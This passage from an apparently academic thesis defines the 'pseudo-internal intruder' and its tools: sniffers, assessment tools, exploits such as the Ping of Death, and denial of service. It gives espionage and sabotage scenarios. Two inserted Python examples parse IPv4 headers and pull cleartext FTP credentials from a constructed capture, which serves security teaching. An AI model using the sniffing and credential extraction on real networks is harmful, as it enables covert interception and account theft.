defenses normally used to guard outside connects. Therefore, as far as system security is
concerned, an intruder accessing the system through a rogue outside connect is, in effect,
inside the network perimeter. Using a rogue outside connect does not require the intruder
to violate the physical perimeter since the rogue outside connect could be the result of
system administrator misconfiguration or users of the system not following security
policy. In such cases the pseudo-internal intruder could gain knowledge and use of the
rogue outside connect without ever violating physical security to create that rogue outside
connect.
Based on these two means of access pseudo-internal intruders can be divided into
two sub-groups: intruders with physical access to some part of a distributed system’s
physical configuration, and intruders with access to a rogue outside connect. The first
sub-group is made up of both insiders and outsiders. Insiders are those who by virtue of
an association with the owner of a distributed system can personally cross the physical
perimeter. Insiders could have access to a wiring closet or perhaps just have a networked
computer on their desk. Examples of insiders are system administrators, users of the
system, support and cleaning staff, physical security personnel, or even contractors
working inside the physical perimeter. Outsiders are intruders who gain their access to
the distributed system’s physical configuration by violating the physical perimeter
through either subterfuge or force. An example of subterfuge might be an outsider
illicitly crossing the physical perimeter by posing as a legitimate insider. Or the outsider
may choose to use force and break through the physical perimeter by simply breaking
into a building.
The second sub-group, those that use rogue outside connects, can avoid having to
contend with any physical perimeter defenses. Note that a rogue outside connect would
not include normal dialup or Internet access that passes through any authentication
system. Remember that the key aspect of rogue outside connects is that they do not pass
through any network perimeter defense mechanisms that might log identity (no user
logins) or prevent access. Although an intruder may be dialing in to an unauthorized
modem from a location outside the physical perimeter, the access gained is the equivalent
of being inside the network perimeter of the system.
1.6 The Pseudo-Internal Intruder: A Distinct Category?
Any newly proposed access oriented intruder category must be examined to
determine if it is truly distinct from the traditional internal and external categories, or
merely a sub-group of an existing category. At first, it intuitively seems that a pseudo-internal intruder might be a sub-group of the internal intruder category. Since such an
intruder is inside the network perimeter of the system, it certainly seems that they are
more ‘internal’ than ‘external’. One must remember, however, that the fundamental
definition for an internal intruder has always been an intruder who has at least limited
user privileges in the system.
Next, consider whether it makes more sense to define pseudo-internal intruders as
a sub-group of external intruders. Problems arise with this approach. The first is that the
access of pseudo-internal intruders allows them to launch attacks that are unavailable to
any intruder faced with network perimeter defenses such as an Internet hacker (the most
infamous type of external intruder). While other differences between pseudo-internal
intruders and those intruders outside of the network perimeter will be explained later in
the thesis, it is sufficient to note one such difference here to illustrate why the attacks are
so dissimilar. It is very difficult to attack a state-of-the-art distributed system from
outside the perimeter and not be detected regardless of the success of the attack. An
unsuccessful attack on a distributed system will leave evidence in the audit logs since
audit tools would record the network traffic involved in the attack. Since an unsuccessful
intruder never gains access, the intruder has no chance to influence the audit tool to
prevent it from reporting the attack. Even if an external intruder is successful in gaining
access to a distributed system it is likely that audit tools will record the successful attack.
Several recent audit tools are constructed to observe and record the contents of incoming
traffic without interacting with the rest of the internal network [ODS98]. Even an
intruder that is successful in breaking through network perimeter defenses may be
recorded by an audit tool that the intruder has no way of interacting with to delete any
evidence of an intrusion. Even older audit tools are designed so that it is difficult to
remove particular information from audit logs without deleting the entire log (i.e. absence
of any audit log will serve as evidence of an intrusion). This problem of being detected
regardless of whether the intruder gains control of a machine or not is not something that
affects the pseudo-internal intruder.
Considering the differences in access to a distributed system, making pseudo-internal intruders a sub-group of external intruders would make calling an intruder
‘external’ an ambiguous statement. For example, such a combination would make an
‘external intruder’ be both an Internet-based hacker and an employee passively
harvesting information from inside the perimeter. Not only does this make the phrase
‘external intruder’ potentially ambiguous, it doesn’t make sense. As has been discussed
above, the access of the pseudo-internal intruder is not external to the system at all.
While the unique access of the pseudo-internal intruder is not equivalent to that of either
a traditional internal or external intruder, it is definitely closer to being internal. Hence,
the name pseudo-internal and not pseudo-external. Due to the pseudo-internal intruder’s
lack of user privileges and dissimilarities with other traditional external intruders, it is a
distinct access oriented category and not a sub-group of one of the two existing
categories.
Our real motivation for carefully defining this new category is that it can be
the basis for better understanding of, defense against, and detection of the pseudo-internal
intruder. The following section will describe the unique tools and techniques and the
behaviors of the pseudo-internal intruder. Example scenarios of theoretical pseudo-internal intruders will help to illustrate the dangers to a distributed system represented by
such intruders. Later sections will describe ways of detecting and defending against the
pseudo-internal intruder.
Chapter 2: Capabilities of the Pseudo-Internal Intruder
2.1 Tools and Techniques Used by the Pseudo-Internal Intruder
The unique aspect of the pseudo-internal intruder category is access to the internal
network from inside the network perimeter. It has been pointed out that accessing the
network of a distributed system from inside the network perimeter allows pseudo-internal
intruders to avoid the auditing and security measures of network perimeter defenses. But
what does this mean with respect to a distributed system’s security? What can a pseudo-internal intruder do that makes him or her such a unique threat? It is helpful to first
review the tools and techniques that pseudo-internal intruders can utilize prior to
explaining the threat and behavior of such intruders. Familiarity with these tools will
lead to a better understanding of such threats since many of the unique abilities of
pseudo-internal intruders derive from the ability to use such tools in ways that no other
kind of intruder can. There are four kinds of tools and techniques that pseudo-internal
intruders can use: network assessment tools, packet sniffers, exploits (that do not require
user accounts), and denial of service attacks.
1. Network assessment tools gather information about the network configuration
and report on potential vulnerabilities of a distributed system. In passive mode, these
tools gather network configuration information by examining the packets passing the
assessment tool’s location on the network. Each packet has a header that contains certain
information about the packet depending on the protocol stack in use in a distributed
system. For example, the header for an IPv4 packet (figure 2-1) contains the source and
destination of the packet, the relative age of the packet, and the type of service the packet
desires from the network. IPv4 packets may also contain the security level of the packet,
the path that the source wanted the packet to follow, the path that the packet actually
followed, and a timestamp from each router the packet traversed.
Figure 2-1: IPv4 Packet Header [Tan96]
Network assessment tools correlate the information gathered from observing packet
headers and can build a picture of a distributed system’s network configuration. This
picture can include not only the routes between nodes in the network configuration, but
details like which nodes send and receive the most traffic, and what services the traffic is
being directed to (FTP, HTTP, Telnet, etc.).
In active mode, network assessment tools not only examine passing packets, but
send out queries over the network. These queries attempt to identify the presence and
type of any device on the network. Most network assessment tools contain databases of
vulnerabilities per operating system and network service. Once the tool finds evidence
that indicates some device it is scanning may have one of the vulnerabilities in its
database, the tool reports this fact to the pseudo-internal intruder. Some tools also
explain how the vulnerability could be exploited. For example, the network assessment
tool may send a request to use the FTP service on a targeted machine. The version
number of the FTP service available on the targeted device is then checked against the
tool’s internal list of FTP versions that contain known vulnerabilities. Perhaps the
targeted device is running one of the FTP versions that are susceptible to an attack where
anonymous users can crash the service and retrieve the shadow password file from the
core dump created by the crash. The shadow password file could then be cracked to
recover user account names and associated passwords on the target machine. In addition
to any information gained from packet headers, all of the FTP vulnerability information
would be reported to the pseudo-internal intruder using the network assessment tool.
2. Packet sniffers record each packet that passes by the sniffer’s location on the
network. In contrast to network assessment tools that scan packet headers, packet
sniffers are used to read and record the contents of the packet. Dumb packet sniffers
simply collect the packets and store them in memory for a human to later examine the
raw data. There are, however, intelligent packet sniffers that are programmed to look for
particular pieces of information such as network account names and passwords. Often
these intelligent sniffers simply discard packets that do not appear to contain the
particular information for which the sniffer is searching. For this reason, intelligent
packet sniffers can run longer before human intervention is required because they store
information more selectively, recording less than the total amount of information passing
the sniffer. Dumb packet sniffers must be periodically checked or swapped out or else
the memory will become full and new packets will either be discarded or written over
already stored packets. The frequency with which the dumb sniffer must be checked
depends on the memory available to the sniffer and the volume of network traffic on the
target system.
Packet sniffers can either be programs run on a normal computer attached to the
network (software sniffers) or autonomous devices built only to analyze network traffic
(hardware sniffers). Hardware sniffers are much more expensive, but have the advantage
of being completely passive. Because it is custom designed, the hardware sniffer can
analyze passing traffic without producing any output at all. This lack of output is unlike
a computer running a software sniffer because the computer will often have to register
itself with the network or have its own unique network identifier even to receive packets
(having an IP address is an example of this in an IP-based network). A highly skilled
pseudo-internal intruder can create a software sniffer that is totally passive (like a
hardware sniffer), but this requires a customizable operating system, like Linux, and a
high degree of knowledge about operating systems as well as pseudo-internal intrusion
techniques.
3. An exploit consists of the steps required to take advantage of a given
vulnerability in a network device (router, hub, etc.) or a machine. An intruder must
perform certain actions to successfully attack a target machine or device. These actions
are usually sequential and can be thought of as a series of steps. By executing the correct
steps in the correct order, a vulnerability can be exploited. The Ping of Death attack is
one example of an exploit. It was found that sending an abnormal sized (very large) ping
packet to machines running the operating system Windows95 would crash the machine.
The following steps are required to execute the Ping of Death exploit:
• Intruder discovers the IP address of the machine to be attacked.
• Intruder sends an oversized ping packet to the target IP address.
• Targeted machine crashes upon receipt of the oversized ping packet.
While a rather simple exploit, the Ping of Death is very effective against machines that
have not been updated with the Microsoft security patch that eliminates the Ping of Death
problem.
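The passive header analysis described under network assessment tools above, and the oversized-datagram signature behind the Ping of Death, as one added example in Python (not code from the thesis): it decodes the fixed IPv4 header from packets constructed inline with RFC 5737 documentation addresses, tallies which nodes send the most traffic and which services are requested, and applies the per-fragment check an audit tool can use to flag a datagram that would exceed 65535 bytes on reassembly. The packet builder, the sample traffic and the service-name table are assumptions made for the demonstration.

```python
"""Passive IPv4 header analysis with an oversized-datagram check.
Added example, not code from the thesis.  The sample packets are constructed
inline with RFC 5737 documentation addresses (192.0.2.0/24); the traffic is invented."""
import ipaddress
import struct
from collections import Counter

SERVICE_NAMES = {21: "FTP", 23: "Telnet", 80: "HTTP"}  # services named in the thesis
MAX_DATAGRAM = 65535  # largest reassembled IPv4 datagram (RFC 791)


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum of 16-bit words (RFC 791); a valid header whose
    checksum field is already filled in sums to 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(pkt: bytes) -> dict:
    """Decode the fixed IPv4 header into what an observer reads without touching
    the payload: source, destination, TTL (the packet's 'relative age'), type of
    service, protocol and fragmentation state."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or ihl > len(pkt):
        raise ValueError("not a well-formed IPv4 header")
    return {
        "tos": tos,
        "total_length": total_len,
        "id": ident,
        "more_fragments": bool(flags_frag & 0x2000),
        "frag_offset": (flags_frag & 0x1FFF) * 8,  # field is in 8-byte units
        "ttl": ttl,
        "protocol": proto,  # 1 = ICMP, 6 = TCP, 17 = UDP
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "checksum_ok": ipv4_checksum(pkt[:ihl]) == 0,
        "payload": pkt[ihl:total_len],
    }


def exceeds_max_datagram(hdr: dict) -> bool:
    """True when this fragment's data would land past the 65535-byte limit once
    reassembled (the over-long echo behind the Ping of Death); works per fragment."""
    return hdr["frag_offset"] + len(hdr["payload"]) > MAX_DATAGRAM


def summarise(packets):
    """From headers alone, build the picture the thesis attributes to a passive
    assessment tool: bytes per sender, services per destination, oversized fragments."""
    talkers, services, oversized = Counter(), Counter(), []
    for pkt in packets:
        h = parse_ipv4(pkt)
        talkers[h["src"]] += h["total_length"]
        # The TCP/UDP destination port is bytes 2-3 of a first fragment's payload.
        if h["protocol"] in (6, 17) and h["frag_offset"] == 0 and len(h["payload"]) >= 4:
            dport = struct.unpack("!H", h["payload"][2:4])[0]
            services[(h["dst"], SERVICE_NAMES.get(dport, str(dport)))] += 1
        if exceeds_max_datagram(h):
            oversized.append((h["src"], h["dst"], h["id"]))
    return talkers, services, oversized


def build_ipv4(src, dst, proto, payload, ttl=64, ident=1, frag_offset=0, more=False):
    """Construct a minimal option-less IPv4 packet for the sample traffic (assumption)."""
    flags_frag = (0x2000 if more else 0) | ((frag_offset // 8) & 0x1FFF)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, flags_frag, ttl,
                      proto, 0, ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:] + payload


def tcp_stub(sport: int, dport: int) -> bytes:
    """Just enough of a TCP header (ports come first) for the port lookup above."""
    return struct.pack("!HH", sport, dport) + b"\x00" * 16


# Constructed sample traffic: two workstations talking to one server, plus the
# last fragment of an ICMP echo whose reassembled size would exceed 65535 bytes.
SAMPLE_PACKETS = [
    build_ipv4("192.0.2.10", "192.0.2.20", 6, tcp_stub(40001, 21)),
    build_ipv4("192.0.2.10", "192.0.2.20", 6, tcp_stub(40002, 80)),
    build_ipv4("192.0.2.11", "192.0.2.20", 6, tcp_stub(40003, 23)),
    build_ipv4("192.0.2.99", "192.0.2.20", 1, b"\x00" * 40, ident=7, frag_offset=65528),
]

if __name__ == "__main__":
    talkers, services, oversized = summarise(SAMPLE_PACKETS)
    print("bytes sent per node:", dict(talkers))
    print("services requested:", dict(services))
    print("fragments exceeding the datagram limit:", oversized)
```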
4. Denial of service attacks are those that degrade the functionality of one or more
machines by preventing the machines from communicating over the internal network.
These are not direct attacks against target machines, but indirect attacks against the
machines’ ability to communicate. For example, the Ping of Death is not a denial of
service attack since it directly targets a vulnerability in a machine’s operating system.
Denial of service attacks are popular because they require less skill than exploiting
vulnerabilities and are extremely difficult to defend against. The attacker does not have
to determine the vulnerabilities of a target machine’s software and what steps are required
to exploit those vulnerabilities. From a functional viewpoint, denying the target machine
the ability to provide service to other machines is the equivalent of taking the machine
down by gaining control of it. Recall that any distributed system has a functionality
policy that dictates the purpose of the system. If a denial of service attack prevents the
distributed system from fulfilling its purpose, then the pseudo-internal intruder has
succeeded.
There are two types of denial of service attacks: network saturation, and traffic
misdirection. Network saturation is the process of flooding the network with useless
traffic so that legitimate requests for service can not reach the target machine. This is the
easiest type of denial of service attack, as it only requires access to the network
configuration, of which the target machine is a node. While there are different methods
of network saturation, the most common is to direct a machine on the same internal
network as the target machine to continuously output packets.
Traffic misdirection is the interception or diverting of network traffic intended for
the target machine. One example of traffic misdirection is IP spoofing. IP spoofing is a
process by which an intruder convinces other computers on the network that his or her
machine is in fact the target machine. In this way no request for service is ever received
by the target machine. IP spoofing does, however, require more technical expertise than
network saturation.
Certain exploits and denial of service attacks have been automated in hacker
programs. Hacker programs are computer programs that attack target machines by
attempting preprogrammed exploits or denial of service attacks. The advantage of such a
program to a pseudo-internal intruder is that very little knowledge of the exploit steps or
vulnerabilities is required of the user. The user simply directs the program to attack
certain machines and it takes action accordingly. The disadvantage is that hacker
programs are usually only preprogrammed with one or two exploits or denial of service
attacks. Hacker programs will not be effective if the targeted machine does not have any
of the exact vulnerabilities for which the hacker program has exploits or denial of service
attacks. An example of a hacker program is WinNuke for Windows. WinNuke attempts
the Ping of Death exploit against any number of machines as directed by the user. All the
user has to do is install the program and direct it to attack a machine. No knowledge of
the Ping of Death packet size or what commands are used to send a Ping of Death packet
is required.
It is also important to note why pseudo-internal intruders can use these four tools
and techniques more effectively than external intruders can. In each case, security
provided by the network perimeter defenses prevents external intruders from effectively
using these tools and techniques. Network assessment tools and packet sniffers are not
effective from outside the network perimeter of a target system because the bulk of
packets transmitted over a network are not intended for destinations outside of the
network perimeter and are not transmitted outside the network perimeter. Network
perimeter defenses, like firewalls, only permit packets intended for destinations in the
outside world to cross the network perimeter. With only the traffic intended for the
outside world to sample from, network assessment tools and packet sniffers would only
be marginally useful. Network perimeter defenses are also often configured to reject the
queries of active network assessment tools. This prevents active network assessment
tools from gathering any information about the internal network. These same network
perimeter defenses would prohibit denial of service attacks or exploits against any device
inside the network perimeter. Any time a firewall detects a critical volume of traffic
targeted for the internal network, it simply refuses to pass on that traffic. Such an attack
would prevent other machines in the outside world from communicating with the
distributed system, but machines inside the network perimeter would not be prevented
from communicating with the target machine or any other machine inside the network
perimeter.
While there are other tools and techniques used by intruders, these four categories
are the only ones that apply to pseudo-internal intruders [Bou98]. A pseudo-internal
intruder has two choices upon gaining access to a distributed system: listen to the system
(read) or try to effect some change upon the system (write). If the pseudo-internal
intruder chooses to listen to the system then he or she can either read the headers of
packets (assessment tools) or the body of packets (sniffers). If the pseudo-internal
intruder decides to attack the system then he or she can either attack the machines on the
network (exploits) or the network itself (denial of service attacks). New pseudo-internal
intruder tools and techniques will surely be developed in the future, but they will fall into
one of the above four categories characterized by reading or writing.
2.2 Dangers of the Pseudo-Internal Intruder
Pseudo-internal intruders have two main courses of action: proactive and passive.
Proactive actions create normal or excessive network traffic. The nature of these actions
is to actively seek out information or effect some change on the network. Passive actions
are those that contribute little or no network traffic to a distributed system’s internal
network. By nature these actions attempt to contribute no traffic at all, but in some cases
passive actions add small amounts of network protocol oriented traffic to the distributed
system. For example, some protocols may require a machine to register its presence in
order to communicate on the network. When the Dynamic Host Configuration Protocol
(DHCP) is in use on a network, each computer must request an IP address from the
DHCP server. The DHCP server grants a ‘lease’ to the requesting computer for a specific
IP address. This exchange creates a small amount of network protocol oriented traffic.
While it is possible for a highly skilled pseudo-internal intruder to avoid such protocol
traffic, many potential intruders with pseudo-internal access will not be able to avoid
these small amounts of protocol traffic. Such traffic is, however, so minimal that it
should not be considered proactive.
A passive pseudo-internal intruder is limited to harvesting information passing
through that segment of the network configuration on which the intruder is located. In
order to gather this information, passive pseudo-internal intruders can only utilize tools
that generate little or no network traffic such as packet sniffers and passive network
assessment tools. Such information may be the actual data traveling over the network or
it may contain clues about the details of the network configuration itself. Although there
are not many different passive actions, the act of harvesting information can compromise
the security of a distributed system. The data itself may be private or the information
gained about the network configuration can lead to the discovery of vulnerabilities in the
system. Passive actions are not available to the traditional external intruder since network
perimeter defenses would prevent the escape of any information not intended for
recipients outside the network perimeter. While it is possible for an internal intruder to
utilize user account privileges to harvest information, it is not really a passive action,
since the utilization of a user account creates normal network traffic. There is a greater
chance that an internal intruder, rather than a passive pseudo-internal intruder, would be
detected harvesting information, because many intrusion detection systems that monitor user
activity would detect the effects of a user running network assessment tools.
The following example scenario of an intrusion will illustrate the danger
represented by a pseudo-internal intruder using only passive actions. The main character
in this example is an industrial espionage agent paid to covertly steal proprietary business
information from a competitor. The agent believes that such information can be found in
the competitor’s distributed system. For information to be of value to the agent’s
employer, the competitor cannot know that such proprietary information has been stolen.
Otherwise the competitor may pursue legal action or purposely invalidate the stolen
information. The phrase target system will be used as a reference to any distributed
system that is the attack target of any particular intruder being discussed.
The agent therefore decides to forgo the risk of testing the network perimeter
defenses of the target system and attempts to gain direct access to the network
configuration. The agent is able to get a job as a custodian for a janitorial service that
cleans the office building that houses the target system. While the agent’s new employee
status does not grant access to restricted areas like server rooms, it does provide access to
several closets that contain hubs and wiring for the target system’s network. These
‘wiring closets’ provide the agent with direct access to the physical configuration, and
therefore the network configuration, of the target system without having to cross the
network perimeter and contend with any network perimeter defenses.
Because the agent’s goal is to gather proprietary information without being
detected, he or she connects a hardware packet sniffer to the hub in one of the wiring
closets. Depending on the style of the packet sniffer, it can be connected to an open port
on the hub or coupled around a cable leading to the hub. The agent is able to cleverly
hide the sniffer and leaves it there for several days. During this time the hardware sniffer
records any packet that is transmitted on the segment which that particular hub is
connected to. Since the hardware sniffer has a finite amount of memory in which to store
the packets, the agent periodically replaces the hardware sniffer with another. The agent
can then take each hardware sniffer to another location to examine the captured packets at
will. While the agent could leave a hardware sniffer in place indefinitely (simply
switching them every few days), the choice is made to remove all hardware sniffers after
a particularly critical high level communication is intercepted. The termination of the
agent’s operation further decreases the chance that the owners of the target system will
ever realize that proprietary information has been compromised. Soon after the removal
of the hardware sniffer, the agent quits the janitorial service citing unhappiness with the
job.
The above industrial agent is an example of an outsider passive pseudo-internal
intruder. This agent has accomplished the mission of compromising the target system
while avoiding any perimeter defense (unlike an external intruder) and not using any user
permissions at all (unlike an internal intruder). The entire attack consisted of passive
actions that would likely go unnoticed by system administrators. Expensive hardware
sniffers, like the one used by the espionage agent, can easily be designed to create no
additional network traffic, while recording all passing network traffic. Recall that most
software sniffers running on ordinary computers (cheaper than custom built hardware
sniffers) create a small amount of network traffic, such as the DHCP exchange described
above, that could be detected by system administrators.
Other pseudo-internal intruders are willing to accept the risk of proactive actions.
This allows the proactive pseudo-internal intruder a wider range of options including
denial of service attacks, exploiting the vulnerabilities of machines on the network, use of
hacker programs, and proactive network assessments. The character in the next scenario
is a disgruntled data entry specialist, an unhappy employee working for the owners of the
target system. This employee is angry about a lack of compensation. The situation has
led the employee to attempt to disrupt the target system in contrast to the previously
mentioned example of an attempt to gather confidential information from a target system.
The disgruntled employee will serve as an example of a proactive pseudo-internal
intruder.
The employee has decided to attack the computer responsible for payroll on the
day that payroll checks are to be created. Although this employee does not have physical
access to any areas like server rooms or wiring closets, he or she still has access to
several network jacks where computers in the office are connected to the network. That
office connection provides the employee with direct access to the internal network of the
target system while circumventing any network perimeter defenses. Each office not only
contains personal desktop computers for most employees, but several computers that are
shared among all employees in each office. The shared machines require no user account
since they are intended for word processing and Internet research, but not for users to log
in to the network. In order to access shared network printers and the Internet, the shared
machines are connected to the network and running the correct protocol stack for the
network. Therefore, the machines can communicate on the network regardless of
whether a user is logged in or not. In case any of his or her actions are detected, the
employee decides to use one of the shared machines in the office. Since many different
employees have access to the shared machine, it would be difficult for system
administrators to connect any suspicious traffic coming from the shared machine to any
single employee.
The disgruntled employee begins the intrusion by running a network assessment
tool on the shared machine, in order to gather information about the target system’s
network configuration. The anonymity provided by using a shared machine encourages
the employee to direct the network assessment tool to conduct a proactive assessment.
Passively intercepting traffic from the server first provides the preliminary
information the employee needs, namely the IP address and name of the payroll server.
Such information allows the employee to direct the assessment tool to proactively gather
information on that single machine. Focusing on a single machine decreases the amount of
network traffic and hence the likelihood that network assessment traffic will be detected
by system administrators. The result from the network assessment tool is a detailed
picture of the payroll server, including what services (FTP, Telnet, etc.) and versions of
software and services the machine is running, and with which network nodes the machine
communicates and how often. Furthermore, assume that the assessment tool intercepted
several user accounts and passwords transmitted over the network when users remotely
logged into the payroll machine; FTP and Telnet send both in the clear. One of those
captured accounts was that of a user with administrative rights on the payroll machine.
Such a user is a type of local system administrator for that single machine.
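The ‘detailed picture’ described above can be reconstructed from captured traffic alone, without sending a single packet. The following Python program is an added example, not code from the thesis or from any assessment tool it cites; the packet summaries, hosts, ports, banners and the password in it are constructed for illustration, and the hypothetical payroll server is 10.1.2.10. For one host it derives the services offered (from the well-known ports it is addressed on and the banners it sends back, which usually reveal the software and version), the peers it talks to and how often, and any FTP USER/PASS pair that crossed the wire unencrypted, which is exactly what the scenario assumes the tool harvested.

```python
"""Passive assessment of one host from captured packet summaries.

Added example; not code from the thesis. Every address, port, banner and
password below is constructed for illustration.
"""
import re
from collections import Counter

# Constructed capture, one packet per line:
#   <time> <src_ip>:<src_port> > <dst_ip>:<dst_port> [payload]
# The hypothetical payroll server is 10.1.2.10; 10.1.5.x are workstations.
SAMPLE_CAPTURE = """\
100.00 10.1.5.21:1034 > 10.1.2.10:21
100.05 10.1.2.10:21 > 10.1.5.21:1034 220 payroll FTP server ready
100.10 10.1.5.21:1034 > 10.1.2.10:21 USER hr_admin
100.20 10.1.2.10:21 > 10.1.5.21:1034 331 Password required
100.30 10.1.5.21:1034 > 10.1.2.10:21 PASS Winter99!
100.40 10.1.2.10:21 > 10.1.5.21:1034 230 User logged in
101.00 10.1.5.22:1100 > 10.1.2.10:23
101.10 10.1.2.10:23 > 10.1.5.22:1100 login:
102.00 10.1.2.10:1025 > 10.1.2.40:139
102.50 10.1.2.10:1026 > 10.1.2.40:139
103.00 10.1.5.30:1200 > 10.1.2.10:80
104.00 10.1.5.21:1040 > 10.1.2.10:21
104.10 10.1.5.21:1040 > 10.1.2.10:21 USER hr_admin
"""

# Well-known ports this toy assessment recognises (a real tool has a far longer table).
SERVICE_NAMES = {21: "ftp", 23: "telnet", 25: "smtp", 80: "http", 139: "netbios-ssn"}

PACKET_RE = re.compile(r"^(\S+)\s+(\S+):(\d+)\s+>\s+(\S+):(\d+)(?:\s+(.*))?$")


def parse_capture(text):
    """Turn the capture text into a list of packet dicts; purely passive, nothing is sent."""
    packets = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        match = PACKET_RE.match(line)
        if match is None:
            raise ValueError("unparseable packet summary: %r" % line)
        ts, src, sport, dst, dport, payload = match.groups()
        packets.append({"ts": float(ts), "src": src, "sport": int(sport),
                        "dst": dst, "dport": int(dport), "payload": payload or ""})
    return packets


def profile_host(packets, host):
    """Build the picture of one machine from the traffic it sends or receives.

    Returns the services it appears to offer (well-known ports it is addressed on),
    the first banner seen from each of those ports (which usually reveals the software
    and its version), each peer with the number of packets exchanged, and any FTP
    USER/PASS pair that crossed the wire unencrypted.
    """
    services, banners, peers, credentials = {}, {}, Counter(), []
    pending_user = {}  # (client ip, client port) -> username awaiting its PASS
    for p in packets:
        if host not in (p["src"], p["dst"]):
            continue
        peer = p["dst"] if p["src"] == host else p["src"]
        peers[peer] += 1
        if p["dst"] == host and p["dport"] < 1024:
            services[p["dport"]] = SERVICE_NAMES.get(p["dport"], "tcp/%d" % p["dport"])
        if p["src"] == host and p["sport"] < 1024 and p["payload"]:
            banners.setdefault(p["sport"], p["payload"])
        if p["dst"] == host and p["dport"] == 21:
            flow = (p["src"], p["sport"])
            command, _, argument = p["payload"].partition(" ")
            if command.upper() == "USER":
                pending_user[flow] = argument
            elif command.upper() == "PASS" and flow in pending_user:
                credentials.append((p["src"], pending_user.pop(flow), argument))
    return {"services": services, "banners": banners,
            "peers": dict(peers), "credentials": credentials}


if __name__ == "__main__":
    picture = profile_host(parse_capture(SAMPLE_CAPTURE), "10.1.2.10")
    for key, value in picture.items():
        print("%-12s %s" % (key, value))
```

Run as a script it prints the services, banners, peers and harvested credentials for the hypothetical payroll server. The point for the defender is that nothing in the program depends on having an account or on crossing a perimeter: everything comes from frames a hub repeats to every port on the segment.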
It is clear that, so far, the disgruntled employee cannot be considered an external
or internal intruder. The employee has not used any user privileges thus far, nor did the
employee have to contend with any perimeter defenses. At this point it is possible that
the employee will become an internal intruder by masquerading as the payroll server
administrator mentioned above. The employee will likely be able to use the permissions
of that account to delete everything on the payroll server. Such a move would likely
destroy the data required to create payroll checks for that week. If the system
administrator account had not been captured, the employee could continue to be a
proactive pseudo-internal intruder and attempt to gain control of the machine by
exploiting some of the vulnerabilities that the assessment tool found. Yet another
possibility would be to launch denial of service attacks against the machine to prevent it
from communicating with other machines in the manner necessary to gather payroll data.
The disgruntled employee scenario involves a single intruder having access to a
distributed system that places the intruder in more than one access oriented intruder
category. In this example, a pseudo-internal intruder harvested system administrator
account information that would have allowed the intruder to log in as the system
administrator. The disgruntled employee would still have the access of a pseudo-internal
intruder, even after logging in as a system administrator and gaining access reserved to
internal intruders. It is possible for a given intruder to start with or obtain more than one
type of access to a target system, thus placing the intruder in more than one access
oriented intruder category. Any intruder with more than one type of access (external,
internal, pseudo-internal) to a distributed system is a multi-category intruder.
The multi-category intruder is not a new concept brought about by the
introduction of a third category to the traditional internal and external pair of intruder
categories. For example, if an Internet hacker (external intruder) discovered a user
account name and its password, then the hacker could log in to the target system as that
user. Once logged in, the external Internet hacker would be taking advantage of user
privileges, thus granting the hacker the access of an internal intruder. This use of user
privileges would not eliminate the fact that the Internet hacker was still also outside the
network perimeter of the system with the access of an external intruder. Since this
example does not involve a pseudo-internal intruder, it appears that multi-category
intruders exist whether one chooses to distinguish intruders by two or three categories.
This issue of multi-category intruders does not, however, affect the definition,
detection, or defense against pseudo-internal intruders. Any intrusion against a target
system can be connected to a primary form of access, which is the access actually used to
complete the intrusion. Several of our examples illustrate such primary forms of access.
Although the disgruntled employee captured the system administrator password using
pseudo-internal access to the target system, if the employee attacked the payroll machine
using the privileges of the administrator account then the employee is acting as an
internal intruder. The attack on the payroll machine would be defined as an internal
intrusion, and defending against the attack would require protection mechanisms
designed to counter internal intruders. Likewise, assume for a moment that the
disgruntled employee did not use the administrator account, and instead launched a denial
of service attack against the payroll machine. That denial of service attack could not be
defined as an internal intrusion since no user account was used. The attack would be a
proactive pseudo-internal intrusion and would require defenses designed to thwart
pseudo-internal intruders. The next section will describe the detection and defenses
against such pseudo-internal intruders.
Chapter 3: Security Recommendations
3.1
Defending Systems Against the Pseudo-Internal Intruder
One of our purposes in defining the category of pseudo-internal intruders is to
provide a carefully defined framework in which to discuss defending systems against a
pseudo-internal intruder. Most of the data gathered on network intrusion incidents
indicates that internal intruders are responsible for the majority of network security
incidents [Pow99]. In a recent survey of financial institutions the most expensive
incident reported was the result of an internal intruder. One bank spent over 2 million
dollars tracking down what they assumed to be an ‘Internet hacker’ that had stolen
intellectual property only to find out it was a disgruntled employee [Mei99]. In fact,
many statements made about internal intruders apply equally to pseudo-internal
intruders. For example, a recent network security incident at a Chinese bank was
widely reported as an ‘internal’ or ‘insider’ job, when the intruders actually used
pseudo-internal tools and techniques [Reu98a, Reu98b]. The defense of systems against
pseudo-internal (and internal) intruders is clearly of growing importance. As network perimeter
defenses get stronger, and they will, more intruders will be forced to attempt to
circumvent the network perimeter defenses and utilize pseudo-internal tools and
techniques.
It is also important to explicitly examine defenses against pseudo-internal
intruders since such defenses are so different from the average defenses used to combat
internal or external intruders. Common intrusion detection systems designed to defend
against internal intruders examine usage patterns of user accounts. These packages seek
to discover unauthorized activity by existing user accounts since internal intruders
The Pseudo-Internal Intruder
40
utilizing user accounts to attack a target system. Clearly, such packages designed to
defend against internal intruders will have no effect against intruders that do not utilize
user accounts (pseudo-internal intruders). Likewise, common external intruder intrusion
detection systems do not affect the pseudo-internal intruder since the focus is on
preventing the external intruder from penetrating the network perimeter. Since the
pseudo-internal intruder is already inside the network perimeter, such network perimeter
defenses do not detect or defend against pseudo-internal intruders.
There are three steps to consider when attempting to protect a system against
potential intruders: denying an intruder access to the distributed system, mitigating the
consequences if an intruder does gain access to the distributed system, and detecting,
monitoring, and recording any intrusions. Recall that, by definition, a pseudo-internal
intruder has to have access to the digital pathways of communication that are part of the
network configuration. Because the pseudo-internal intruder is our primary concern, this
section will first address the issue of denying intruders access to the network
configuration of a distributed system. Denying access to the network configuration
